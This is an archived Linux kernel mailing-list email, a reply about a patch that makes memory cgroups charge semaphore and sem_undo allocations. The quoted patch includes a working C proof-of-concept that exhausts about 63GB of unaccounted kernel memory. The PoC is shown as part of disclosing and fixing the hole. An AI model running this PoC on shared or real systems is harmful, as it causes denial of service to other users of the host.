From mboxrd@z Thu Jan  1 00:00:00 1970
Return-Path: <SRS0=osCV=MH=kvack.org=owner-linux-mm@kernel.org>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
X-Spam-Level: 
X-Spam-Status: No, score=-23.3 required=3.0 tests=BAYES_00,DKIMWL_WL_MED,
	DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,HEADER_FROM_DIFFERENT_DOMAINS,
	INCLUDES_CR_TRAILER,INCLUDES_PATCH,MAILING_LIST_MULTI,SPF_HELO_NONE,SPF_PASS,
	USER_IN_DEF_DKIM_WL autolearn=ham autolearn_force=no version=3.4.0
Received: from mail.kernel.org (mail.kernel.org [198.145.29.99])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 16793C636C7
	for <linux-mm@archiver.kernel.org>; Thu, 15 Jul 2021 17:07:22 +0000 (UTC)
Received: from kanga.kvack.org (kanga.kvack.org [205.233.56.17])
	by mail.kernel.org (Postfix) with ESMTP id A0328613CC
	for <linux-mm@archiver.kernel.org>; Thu, 15 Jul 2021 17:07:21 +0000 (UTC)
DMARC-Filter: OpenDMARC Filter v1.3.2 mail.kernel.org A0328613CC
Authentication-Results: mail.kernel.org; dmarc=fail (p=reject dis=none) header.from=google.com
Authentication-Results: mail.kernel.org; spf=pass smtp.mailfrom=owner-linux-mm@kvack.org
Received: by kanga.kvack.org (Postfix)
	id 075F18D00E5; Thu, 15 Jul 2021 13:07:22 -0400 (EDT)
Received: by kanga.kvack.org (Postfix, from userid 40)
	id 04C678D00CD; Thu, 15 Jul 2021 13:07:21 -0400 (EDT)
X-Delivered-To: int-list-linux-mm@kvack.org
Received: by kanga.kvack.org (Postfix, from userid 63042)
	id E304C8D00E5; Thu, 15 Jul 2021 13:07:21 -0400 (EDT)
X-Delivered-To: linux-mm@kvack.org
Received: from forelay.hostedemail.com (smtprelay0183.hostedemail.com [216.40.44.183])
	by kanga.kvack.org (Postfix) with ESMTP id BF9208D00CD
	for <linux-mm@kvack.org>; Thu, 15 Jul 2021 13:07:21 -0400 (EDT)
Received: from smtpin38.hostedemail.com (10.5.19.251.rfc1918.com [10.5.19.251])
	by forelay05.hostedemail.com (Postfix) with ESMTP id 9E87F1858A4A5
	for <linux-mm@kvack.org>; Thu, 15 Jul 2021 17:07:20 +0000 (UTC)
X-FDA: 78365453040.38.712F00E
Received: from mail-lf1-f53.google.com (mail-lf1-f53.google.com [209.85.167.53])
	by imf30.hostedemail.com (Postfix) with ESMTP id 15D5CE0106CB
	for <linux-mm@kvack.org>; Thu, 15 Jul 2021 17:05:55 +0000 (UTC)
Received: by mail-lf1-f53.google.com with SMTP id x25so11070410lfu.13
        for <linux-mm@kvack.org>; Thu, 15 Jul 2021 10:05:55 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=google.com; s=20161025;
        h=mime-version:references:in-reply-to:from:date:message-id:subject:to
         :cc;
        bh=oseTPKEuU4SU0H2DJsSeCJ4qHMH8gCDE013mBDWTIw4=;
        b=u7l8zfwriNOzshaE6JUVJlf6jSIxSa+Cs6G3xzg5HCpwmauKGG3SW/2UU3Q3LF2Z9z
         mbJASEhoUQ6QA0bhenrLEG51r1NvbAgNYsguojeiplU+3RQVDylPTuFWJdVA3GUbzqTX
         y3AteLNsHxyqws6XPkca1Dsn8qfkcv4Sjt4iayg8oE1blv5nmM8yRnCauU0oQF6aGhWR
         IL89h/0Xr/mS1RFz1BMQvJJUNwG5yV16uhlxG3qRINL7pu3ZPD1SjhAeJ3pPSlMj4mGs
         y0JmOBEonbiTggUw6zkRm2R6fPYI3XMPHlDNW1W6LF2oYPNtJbdH1ppoS+YZ/cjws8LJ
         qwyQ==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20161025;
        h=x-gm-message-state:mime-version:references:in-reply-to:from:date
         :message-id:subject:to:cc;
        bh=oseTPKEuU4SU0H2DJsSeCJ4qHMH8gCDE013mBDWTIw4=;
        b=DzK5ET4zFckYg1Nz6JRqreC9n4rqZjH47HyiL8l99C+o0CSbtV937Weeuy5mwRo9iT
         Ui1Ka4XShriKGHAqh/FjeI8KoPqgqtNZ7O8pSKCASGScgSn8mEu4sg0bX1tQpYKLmFHC
         tfIj0lZRQSMBdPmLXYGWfQwd5nT4a52C2C5Yuxjv8bapO8piCPqfxjr2czUoS78NpN1C
         nKd5EKwXBWm+KlxOGGOY50GlYtJSyYM4FjwJAaPOAisMQSsqYgNsdq/MkDj3/M0+CjrL
         FeXf9joshFltwwhd8hvglu1eRbBOSOaHxo5N48WD6hyY4htDUTMUOnPwvyGO4tBnzc0v
         ohzA==
X-Gm-Message-State: AOAM532c1oRf9Z7UzW9Lt9dZ5Ut1IbzDuiY9GAheJsiZOIf8t5q9Jqk7
	LhD6QGa5R99799nBgDLIDlxUO2fNGVfXJygKkY7PoQ==
X-Google-Smtp-Source: ABdhPJx2c4viqlDkUmTTpXxRJbnXQGeRxfgn4kStUB/KY45AURbAjEh8bw0tgi5VF7ng8tzvLQx3yKMQGgUws6fn0Pc=
X-Received: by 2002:a19:ad4d:: with SMTP id s13mr4182972lfd.432.1626368754163;
 Thu, 15 Jul 2021 10:05:54 -0700 (PDT)
MIME-Version: 1.0
References: <1626333284-1404-1-git-send-email-nglaive@gmail.com>
In-Reply-To: <1626333284-1404-1-git-send-email-nglaive@gmail.com>
From: Shakeel Butt <shakeelb@google.com>
Date: Thu, 15 Jul 2021 10:05:42 -0700
Message-ID: <CALvZod4-Vh4O4-PN661jqicSg95GPf87nv10xAYr1yG6oZQk8A@mail.gmail.com>
Subject: Re: [PATCH] memcg: charge semaphores and sem_undo objects
To: Yutian Yang <nglaive@gmail.com>, Vasily Averin <vvs@virtuozzo.com>
Cc: Michal Hocko <mhocko@kernel.org>, Johannes Weiner <hannes@cmpxchg.org>, 
	Vladimir Davydov <vdavydov.dev@gmail.com>, Cgroups <cgroups@vger.kernel.org>, 
	Linux MM <linux-mm@kvack.org>, shenwenbo@zju.edu.cn
Content-Type: text/plain; charset="UTF-8"
X-Rspamd-Server: rspam04
X-Rspamd-Queue-Id: 15D5CE0106CB
X-Stat-Signature: hiaf1e99maht1o36ksjmqrx1686eeztm
Authentication-Results: imf30.hostedemail.com;
	dkim=pass header.d=google.com header.s=20161025 header.b=u7l8zfwr;
	dmarc=pass (policy=reject) header.from=google.com;
	spf=pass (imf30.hostedemail.com: domain of shakeelb@google.com designates 209.85.167.53 as permitted sender) smtp.mailfrom=shakeelb@google.com
X-HE-Tag: 1626368755-361127
X-Bogosity: Ham, tests=bogofilter, spamicity=0.000000, version=1.2.4
Sender: owner-linux-mm@kvack.org
Precedence: bulk
X-Loop: owner-majordomo@kvack.org
List-ID: <linux-mm.kvack.org>

+Vasily Averin

On Thu, Jul 15, 2021 at 12:15 AM Yutian Yang <nglaive@gmail.com> wrote:
>
> This patch adds accounting flags to semaphores and sem_undo allocation
> sites so that kernel could correctly charge these objects.
>
> A malicious user could take up more than 63GB unaccounted memory under
> default sysctl settings by exploiting the unaccounted objects. She could
> allocate up to 32,000 unaccounted semaphore sets with up to 32,000
> unaccounted semaphore objects in each set. She could further allocate one
> sem_undo unaccounted object for each semaphore set.
>
> The following code shows a PoC that takes ~63GB unaccounted memory, while
> it is charged for only less than 1MB memory usage. We evaluate the PoC on
> QEMU x86_64 v5.2.90 + Linux kernel v5.10.19 + Debian buster.
>
> /*------------------------- POC code ----------------------------*/
> #define _GNU_SOURCE
> #include <sys/types.h>
> #include <sys/ipc.h>
> #include <sys/sem.h>
> #include <sys/stat.h>
> #include <time.h>
> #include <stdint.h>
> #include <stdlib.h>
> #include <unistd.h>
> #include <stdio.h>
> #include <sched.h>
>
> #define errExit(msg)    do { perror(msg); exit(EXIT_FAILURE); \
>                         } while (0)
>
> int main(int argc, char *argv[]) {
>   int err, semid;
>   struct sembuf sops;
>   for (int i = 0; i < 31200; ++i) {
>     semid = semget(IPC_PRIVATE, 31200, IPC_CREAT);
>     if (semid == -1) {
>       errExit("semget");
>     }
>     sops.sem_num = 0;
>     sops.sem_op = 1;
>     sops.sem_flg = SEM_UNDO;
>     err = semop(semid, &sops, 1);
>     if (err == -1) {
>       errExit("semop");
>     }
>   }
>   while(1);
>   return 0;
> }
> /*-------------------------- end --------------------------------*/
>
> Thanks!
>
> Yutian Yang,
> Zhejiang University
>
> Signed-off-by: Yutian Yang <nglaive@gmail.com>

Thanks for the patch Yutian. I remember patch from Vasily regarding
memcg charging of similar objects.

Vasily, what's the status of your patch?

> ---
>  ipc/sem.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
>
> diff --git a/ipc/sem.c b/ipc/sem.c
> index f6c30a85d..6860de0b1 100644
> --- a/ipc/sem.c
> +++ b/ipc/sem.c
> @@ -511,7 +511,7 @@ static struct sem_array *sem_alloc(size_t nsems)
>         if (nsems > (INT_MAX - sizeof(*sma)) / sizeof(sma->sems[0]))
>                 return NULL;
>
> -       sma = kvzalloc(struct_size(sma, sems, nsems), GFP_KERNEL);
> +       sma = kvzalloc(struct_size(sma, sems, nsems), GFP_KERNEL_ACCOUNT);
>         if (unlikely(!sma))
>                 return NULL;
>
> @@ -1935,7 +1935,7 @@ static struct sem_undo *find_alloc_undo(struct ipc_namespace *ns, int semid)
>         rcu_read_unlock();
>
>         /* step 2: allocate new undo structure */
> -       new = kzalloc(sizeof(struct sem_undo) + sizeof(short)*nsems, GFP_KERNEL);
> +       new = kzalloc(sizeof(struct sem_undo) + sizeof(short)*nsems, GFP_KERNEL_ACCOUNT);
>         if (!new) {
>                 ipc_rcu_putref(&sma->sem_perm, sem_rcu_free);
>                 return ERR_PTR(-ENOMEM);
> --
> 2.25.1
>